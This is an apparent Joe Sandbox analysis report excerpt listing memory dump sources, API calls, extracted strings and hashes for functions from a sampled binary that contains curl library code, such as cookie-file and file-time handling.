                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: fopenfwriteqsortstrcmptime
                                                                                                                                                                                                                                                            • String ID: # Netscape HTTP Cookie File# https://curl.haxx.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.$#HttpOnly_$%s$%s%s%s%s%s%s%I64d%s%s$FALSE$TRUE$unknown
                                                                                                                                                                                                                                                            • API String ID: 489802191-4155909777
                                                                                                                                                                                                                                                            • Opcode ID: 1a50c9375fe1c953f7967403f1e58dc5703ca83424e99d8aaa7dad3e29625a8a
                                                                                                                                                                                                                                                            • Instruction ID: 0db058a8fa7257460f2fa8dc820d5a65e20934ffdb94048c2c0c034698602e97
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1a50c9375fe1c953f7967403f1e58dc5703ca83424e99d8aaa7dad3e29625a8a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A481B0B1A043019FDB109F29D985A1AB7E4EF84308F084979F949D7222E775ECB4CB96
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: fputc$fwritestrchr
                                                                                                                                                                                                                                                            • String ID: %.0f$%.3f$%.6f$%03ld$%ld$curl: unknown --write-out variable: '%s'
                                                                                                                                                                                                                                                            • API String ID: 3129928417-2797245882
                                                                                                                                                                                                                                                            • Opcode ID: aeb3dac14ddb333ea151d4329f5668841886efd10418a0936ea29a9ca29f53c1
                                                                                                                                                                                                                                                            • Instruction ID: cea5b8c545bee3e283069eca61262fd377eb7544fe6a8e00aa3050d569cfbaa6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aeb3dac14ddb333ea151d4329f5668841886efd10418a0936ea29a9ca29f53c1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 94B1D675638305BAD718DE50DC51FBBBBACDF49740F14482AF98582182E3B0D9B49B63
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00240260: strcmp.MSVCRT ref: 0024029F
                                                                                                                                                                                                                                                              • Part of subcall function 00240260: strcmp.MSVCRT ref: 002402B5
                                                                                                                                                                                                                                                              • Part of subcall function 00240260: strcmp.MSVCRT ref: 002402CB
                                                                                                                                                                                                                                                              • Part of subcall function 00240260: strcmp.MSVCRT ref: 002402E1
                                                                                                                                                                                                                                                              • Part of subcall function 00240260: strcmp.MSVCRT ref: 002402F7
                                                                                                                                                                                                                                                              • Part of subcall function 00240260: strcmp.MSVCRT ref: 0024030D
                                                                                                                                                                                                                                                              • Part of subcall function 00240260: strcmp.MSVCRT ref: 00240323
                                                                                                                                                                                                                                                              • Part of subcall function 00240260: strcmp.MSVCRT ref: 00240339
                                                                                                                                                                                                                                                            • fclose.MSVCRT ref: 0023AF92
                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0023B116
                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0023B12A
                                                                                                                                                                                                                                                            • _close.MSVCRT ref: 0023B145
                                                                                                                                                                                                                                                            • fflush.MSVCRT ref: 0023DCB1
                                                                                                                                                                                                                                                            • _fileno.MSVCRT ref: 0023DCC0
                                                                                                                                                                                                                                                            • fseek.MSVCRT ref: 0023DCF2
                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0023E274
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • \Z, xrefs: 0023DB7F
                                                                                                                                                                                                                                                            • CURLOPT_TFTP_NO_OPTIONS, xrefs: 0023D9AA
                                                                                                                                                                                                                                                            • CURLOPT_HAPPY_EYEBALLS_TIMEOUT_MS, xrefs: 0023D9E4
                                                                                                                                                                                                                                                            • curl: Saved to filename '%s', xrefs: 0023DB7A
                                                                                                                                                                                                                                                            • Transient problem: %s Will retry in %ld seconds. %ld retries left., xrefs: 0023DC17
                                                                                                                                                                                                                                                            • RP7:, xrefs: 0023DBB2
                                                                                                                                                                                                                                                            • Throwing away %I64d bytes, xrefs: 0023DC96
                                                                                                                                                                                                                                                            • CURLOPT_HAPROXYPROTOCOL, xrefs: 0023DA1B
                                                                                                                                                                                                                                                            • CURLOPT_DISALLOW_USERNAME_IN_URL, xrefs: 0023DA52
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strcmp$free$_close_filenofclosefflushfseek
                                                                                                                                                                                                                                                            • String ID: CURLOPT_DISALLOW_USERNAME_IN_URL$CURLOPT_HAPPY_EYEBALLS_TIMEOUT_MS$CURLOPT_HAPROXYPROTOCOL$CURLOPT_TFTP_NO_OPTIONS$RP7:$Throwing away %I64d bytes$Transient problem: %s Will retry in %ld seconds. %ld retries left.$curl: Saved to filename '%s'$\Z
                                                                                                                                                                                                                                                            • API String ID: 462954383-1622027912
                                                                                                                                                                                                                                                            • Opcode ID: 4845b13e1a9faa5a3b2b4f2e4bb6a76b133e983ea4b2ae01e437fe3fcece1446
                                                                                                                                                                                                                                                            • Instruction ID: 397605380a108fd2929bb29a79c649f576081fb6d378e368e3ded8eaad3cf4b0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4845b13e1a9faa5a3b2b4f2e4bb6a76b133e983ea4b2ae01e437fe3fcece1446
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6191C4B0618342AFE724DF14D945B6BB7E6AF94708F14482DF588972A2E771DC60CF42
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • %0*lu, xrefs: 002414F6
                                                                                                                                                                                                                                                            • internal error: invalid pattern type (%d), xrefs: 00241594
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: mallocmemcpystrlenstrtoul
                                                                                                                                                                                                                                                            • String ID: %0*lu$internal error: invalid pattern type (%d)
                                                                                                                                                                                                                                                            • API String ID: 1264475146-449433499
                                                                                                                                                                                                                                                            • Opcode ID: e18c8995e826ea44c8579a89fd091fdc59c901c970b1d128fb375034b4fc640c
                                                                                                                                                                                                                                                            • Instruction ID: aeba44035856cdd55523182c1fabcbe98e03425afd844fbf33411d846a37a31f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e18c8995e826ea44c8579a89fd091fdc59c901c970b1d128fb375034b4fc640c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B75103B5E18305ABDB08DF14D841BABB7A9AF84344F04487DF94A87342F775E9708B62
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,00000080,00000007,00000000,00000003,00000000,00000000), ref: 00233D4E
                                                                                                                                                                                                                                                            • GetFileTime.KERNEL32(00000000,00000000,00000000), ref: 00233D63
                                                                                                                                                                                                                                                            • fwrite.MSVCRT ref: 00233D8E
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00233D98
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00233DAD
                                                                                                                                                                                                                                                            • fprintf.MSVCRT ref: 00233DBA
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00233DCE
                                                                                                                                                                                                                                                            • fprintf.MSVCRT ref: 00233DDB
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00233E10
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • Failed to get filetime: GetFileTime failed: GetLastError %u, xrefs: 00233DD5
                                                                                                                                                                                                                                                            • Failed to get filetime: underflow, xrefs: 00233D89
                                                                                                                                                                                                                                                            • Failed to get filetime: CreateFile failed: GetLastError %u, xrefs: 00233DB4
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorLast$Filefprintf$CloseCreateHandleTimefwrite
                                                                                                                                                                                                                                                            • String ID: Failed to get filetime: CreateFile failed: GetLastError %u$Failed to get filetime: GetFileTime failed: GetLastError %u$Failed to get filetime: underflow
                                                                                                                                                                                                                                                            • API String ID: 2990661452-2112902429
                                                                                                                                                                                                                                                            • Opcode ID: 8a73185b2b9f7a3125205934bf4ca88da975cbf802e20e87db1ebda575c13d5c
                                                                                                                                                                                                                                                            • Instruction ID: a852008217a0be47d8092b4cb92615cbe5c6a0760157b2a26fee8d7ba8705b49
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a73185b2b9f7a3125205934bf4ca88da975cbf802e20e87db1ebda575c13d5c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F12180717403007BE6206A399C47F26378CDB85735F240328FD34FA2D1FAA56E154326
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _errno$strlen$strcpy
                                                                                                                                                                                                                                                            • String ID: %d.%d.%d.%d$%lx
                                                                                                                                                                                                                                                            • API String ID: 4259186295-1067823383
                                                                                                                                                                                                                                                            • Opcode ID: 478295fb0e33c449eb61d65d10ed8e997e8b85951f51754320162832cffe5a0d
                                                                                                                                                                                                                                                            • Instruction ID: 37e41f215da2405400c2207c19a28fcb268eb5d6ac4b2ac84af983cd75f3013d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 478295fb0e33c449eb61d65d10ed8e997e8b85951f51754320162832cffe5a0d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76B138316547119FEB2C5D288CD036E76D6EB91338F28873DE4B6821D1E7788C658BA3
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • Unknown pseudo relocation protocol version %d., xrefs: 004B7DC4
                                                                                                                                                                                                                                                            • Unknown pseudo relocation bit size %d., xrefs: 004B7CF9
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                                                                                                                            • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                                                                                                                                                                                            • API String ID: 544645111-395989641
                                                                                                                                                                                                                                                            • Opcode ID: e0ee05fe2d71d4efb37d540786a5f62199b4dfa802accb50463abc60b5b6d515
                                                                                                                                                                                                                                                            • Instruction ID: da95648c5b2a75c25b2264aafdaf6fe2f919c856eede0635e07b44d4a06b97d8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e0ee05fe2d71d4efb37d540786a5f62199b4dfa802accb50463abc60b5b6d515
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9A1C170A082008FDB14AF79C5C07AABBE1BFD4314F25865FD8989B381D379D8458B6A
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: free$_strdupmallocstrcspnstrlenstrncpystrpbrk
                                                                                                                                                                                                                                                            • String ID: pkcs11:
                                                                                                                                                                                                                                                            • API String ID: 2132323148-2446828420
                                                                                                                                                                                                                                                            • Opcode ID: 383150cc4e869893a1ec5be8eccdf3c1a2395db00d77d41887131f3792e3c9c9
                                                                                                                                                                                                                                                            • Instruction ID: a83bcc181640e0eeb6a4075ee8b206da88b40b028dd5b2c1e3bd5e409818aa08
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 383150cc4e869893a1ec5be8eccdf3c1a2395db00d77d41887131f3792e3c9c9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15512BE0D2C3575BD7246E698C8577AB6E49F17300F18046DE8C997202F6E9ACA0D7A2
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: free$_strdupmallocstrcmp$callocfclosestrlen
                                                                                                                                                                                                                                                            • String ID: P"-$t,hY|M
                                                                                                                                                                                                                                                            • API String ID: 2566626035-4237880157
                                                                                                                                                                                                                                                            • Opcode ID: 4ddc3aca00f3133c1521628d15ce864f6a3ceafb0108be387e90ab0f58a0a4e4
                                                                                                                                                                                                                                                            • Instruction ID: 8e514b8a5adb1403c579c5c14e7a2cb925a94ca3ccfbac1d5bb849026e1cfe66
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ddc3aca00f3133c1521628d15ce864f6a3ceafb0108be387e90ab0f58a0a4e4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53418EF1A143419BEB289F51C845B5BB3E8AF80304F04487DF89A97291E775E828CB53
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • fprintf.MSVCRT ref: 00233E62
                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,00000100,00000007,00000000,00000003,00000000,00000000,?,?), ref: 00233E7F
                                                                                                                                                                                                                                                            • SetFileTime.KERNEL32(00000000,00000000), ref: 00233EB6
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00233EC0
                                                                                                                                                                                                                                                            • fprintf.MSVCRT ref: 00233ECF
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00233ED8
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00233EE6
                                                                                                                                                                                                                                                            • fprintf.MSVCRT ref: 00233EF5
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • Failed to set filetime %I64d on outfile: SetFileTime failed: GetLastError %u, xrefs: 00233EC9
                                                                                                                                                                                                                                                            • Failed to set filetime %I64d on outfile: CreateFile failed: GetLastError %u, xrefs: 00233EEF
                                                                                                                                                                                                                                                            • Failed to set filetime %I64d on outfile: overflow, xrefs: 00233E5C
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: fprintf$ErrorFileLast$CloseCreateHandleTime
                                                                                                                                                                                                                                                            • String ID: Failed to set filetime %I64d on outfile: CreateFile failed: GetLastError %u$Failed to set filetime %I64d on outfile: SetFileTime failed: GetLastError %u$Failed to set filetime %I64d on outfile: overflow
                                                                                                                                                                                                                                                            • API String ID: 1024183469-2649542943
                                                                                                                                                                                                                                                            • Opcode ID: 6ba661909e9fd394bdf42292bef9d1cffe690fa12e13031f57b403591546b861
                                                                                                                                                                                                                                                            • Instruction ID: fe0805bc334cdf2198657c3a10d0f70d7115232cae2cb326badc693345b57e94
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ba661909e9fd394bdf42292bef9d1cffe690fa12e13031f57b403591546b861
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB1157B5B003003BD624AF25AC0AF7B7A9CEF45B18F15141DF909B92D2F1A5AA1443B6
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strlen$qsortstrchrstrncmptime
                                                                                                                                                                                                                                                            • String ID: .$/
